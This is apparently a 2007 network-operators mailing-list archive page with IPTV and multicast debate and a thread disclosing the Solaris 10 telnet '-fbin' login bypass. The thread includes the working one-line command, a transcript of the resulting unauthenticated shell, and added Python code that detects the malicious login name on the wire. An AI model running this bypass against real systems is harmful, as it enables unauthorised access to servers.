Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Gadi Evron

On Mon, 12 Feb 2007, David W. Hankins wrote:
 
 On Sun, Feb 11, 2007 at 11:14:49AM -0700, brett watson wrote:
  Verisign, the American firm which provides the backbone for much of  
  the net, including domain names .com and .net,...
 
 IP over domain name registration?

We already had Video over DNS.

Why not?



Solaris 10 Telnet Exploit

2007-02-11 Thread William Schultz


http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html


Tested on Sol10, and it indeed works... Good thing we use SSH, right?!


iWil:~ wschultz$ telnet -l -fbin dns1
Trying A.B.C.D...
Connected to dns1.my.com.
Escape character is '^]'.
Last login: Sun Feb 11 18:11:05 from A.B.C.D
Sun Microsystems Inc.   SunOS 5.10  Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$




Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Stephen Sprunk


Thus spake Daniel Senie [EMAIL PROTECTED]

At 02:57 PM 2/11/2007, Paul Vixie wrote:
...wouldn't there be, if interdomain multicast existed and had a billing
model that could lead to a compelling business model?  right now, to the
best of my knowledge, all large multicast flows are still intradomain.


IP Multicast as a solution to video distribution is a non-starter. IP 
Multicast for the wide area is a failure. It assumes large numbers of 
people will watch the same content at the same time. The usage model 
that could work for it most mimics the broadcast environment before 
cable TV, when there were anywhere from three to ten channels to 
choose from, and everyone watched one of those. That model has not 
made sense in a long time. The proponents of IP Multicast seem to have 
failed to notice this.


IPmc would be useful for sports, news, and other live events.  Think 
about how many people sit around their TVs staring at such things; it's 
probably a significant fraction of all TV-watching time.  Better yet, 
folks who want to watch particular sports games will be concentrated in 
the two cities that are playing (i.e. high fanout at the bottom of the 
tree), which multicast delivery excels at compared to unicast.


For non-live content, even if one assumes people want their next episode 
of 24 on demand, wouldn't it make more sense to multicast it to STBs 
that are set to record it (or that predict their owners will want to see 
it), vs. using P2P or direct download?  That'll save you gobs and gobs 
of bandwidth _immediately following the new program's release_.  After 
that majority of viewers get their copy, you can transition the program 
to another system (e.g. P2P) that is more amenable to on-demand 
downloading of old content.


Of course, this is a pointless discussion since residential multicast is 
virtually non-existent today, and there's no sign of it being imminent. 
Anyone want to take bets on whether IPmc or IPv6 shows up first?  ;-)


S

Stephen Sprunk    God does not play dice.  --Albert Einstein
CCIE #3723        God is an inveterate gambler, and He throws the
K5SSS             dice at every possible opportunity. --Stephen Hawking





Re: Solaris 10 Telnet Exploit

2007-02-11 Thread Gadi Evron

On Sun, 11 Feb 2007, William Schultz wrote:
 
 http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html
 
 Tested on Sol10, and it indeed works... Good thing we use SSH, right?!

It works.
Credit to Johannes Ullrich at the SANS ISC.

I believe the vulnerability is that it is running telnet by default.


 
 
 iWil:~ wschultz$ telnet -l -fbin dns1
 Trying A.B.C.D...
 Connected to dns1.my.com.
 Escape character is '^]'.
 Last login: Sun Feb 11 18:11:05 from A.B.C.D
 Sun Microsystems Inc.   SunOS 5.10  Generic January 2005
 $ id
 uid=2(bin) gid=2(bin)
 $
 
 



Re: Solaris 10 Telnet Exploit

2007-02-11 Thread Gadi Evron

From HD Moore:
but this bug isn't -froot, it's -fanythingbutroot =P

On Sun, 11 Feb 2007, William Schultz wrote:

 
 http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html
 
 Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
 
 
 iWil:~ wschultz$ telnet -l -fbin dns1
 Trying A.B.C.D...
 Connected to dns1.my.com.
 Escape character is '^]'.
 Last login: Sun Feb 11 18:11:05 from A.B.C.D
 Sun Microsystems Inc.   SunOS 5.10  Generic January 2005
 $ id
 uid=2(bin) gid=2(bin)
 $
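
How the `-l -fbin` login name in the transcript above reaches the server, and how a network sensor could flag it (an added example, not part of the original posts): with `-l`, the telnet client sends the name as the USER variable in a NEW-ENVIRON subnegotiation (RFC 1572), so a name that begins with `-` is visible on the wire before login(1) ever parses it. The function names and the sample bytes are constructed for illustration, and only option 39 (NEW-ENVIRON) is handled.

```python
# Telnet constants from RFC 854 and RFC 1572 (NEW-ENVIRON).
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON, IS, INFO = 39, 0, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def subnegotiations(stream: bytes):
    """Yield (option, payload) for every complete IAC SB ... IAC SE block."""
    i = 0
    while i < len(stream) - 2:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] != SB:
            i += 2  # IAC IAC (escaped 0xFF) or some other command
        else:
            opt, j, payload = stream[i + 2], i + 3, bytearray()
            while j < len(stream) - 1:
                if stream[j] == IAC and stream[j + 1] == SE:
                    yield opt, bytes(payload)
                    break
                if stream[j] == IAC:  # IAC IAC inside SB is one literal 0xFF
                    j += 1
                payload.append(stream[j])
                j += 1
            i = j + 2

def env_vars(payload: bytes) -> dict:
    """Decode an IS/INFO payload into {name: value}; ESC quotes the next byte."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    entries, cur, it = [], None, iter(payload[1:])
    for b in it:
        if b in (VAR, USERVAR):
            entries.append([bytearray(), bytearray()])
            cur = entries[-1][0]
        elif b == VALUE and entries:
            cur = entries[-1][1]
        elif cur is not None:
            cur.append(next(it, ESC) if b == ESC else b)
    return {n.decode("latin-1"): v.decode("latin-1") for n, v in entries}

def suspicious_logins(stream: bytes) -> list:
    """USER values that login(1) would parse as an option (leading '-')."""
    users = (env_vars(p).get("USER", "") for o, p in subnegotiations(stream) if o == NEW_ENVIRON)
    return [u for u in users if u.startswith("-")]

def sample(user: str) -> bytes:
    """Constructed client bytes: IAC SB NEW-ENVIRON IS VAR "USER" VALUE <user> IAC SE."""
    return bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE]) + user.encode() + bytes([IAC, SE])
```

`suspicious_logins(sample("-fbin"))` returns `["-fbin"]`, while an ordinary login name returns an empty list.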
 
 



Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Matthew Sullivan


Owen DeLong wrote:


Today IPTV is in its infancy and is strictly a novelty for early adopters.
As the technology matures and as the market develops an understanding of the
possibilities creating pressure on manufacturers and content providers to
offer better, it will gradually become compelling.

In case you missed it something we're doing over here...
http://uctv.canberra.edu.au/


We have HDTV and quite a list of channels on campus.  Of course 
licensing/broadcast restrictions (read: lawyers) have a lot stopped at 
the border, but hey, it's working ;-)


Regards,

Mat



Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Paul Vixie

[EMAIL PROTECTED] (Geo.) writes:

 IDMR is great if you're a broadcaster or a backbone, but how does it help 
 the last 2 miles, the phoneco ATM network or the ISP network where you have 
 10k different users watching 10k different channels?

http://tools.ietf.org/html/draft-ietf-mboned-auto-multicast-00 is what i
expect.  note: i've drunk that koolaid & am helping on the distribution side.
-- 
Paul Vixie


Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Sean Donelan


On Sun, 11 Feb 2007, Gadi Evron wrote:

Colin Powell mentioned at RSA in his extremely good, entertaining and
pointless talk something of relevance. During the cold war American kids
were trained to hide beneath their desktops in case of a nuclear
attack. Much good that would have done.


The important lesson is you can educate people. The content may have been
bogus, but it was very effective at reaching most of the population. 
People who grew up during that era still remember it.


If you can come up with a few simple things to do, it is possible to
reach most of the public.  But we are our own worst enemies.  When we
have the opportunity, instead of giving the few simple things everyone
could do, we create a lot of confusion.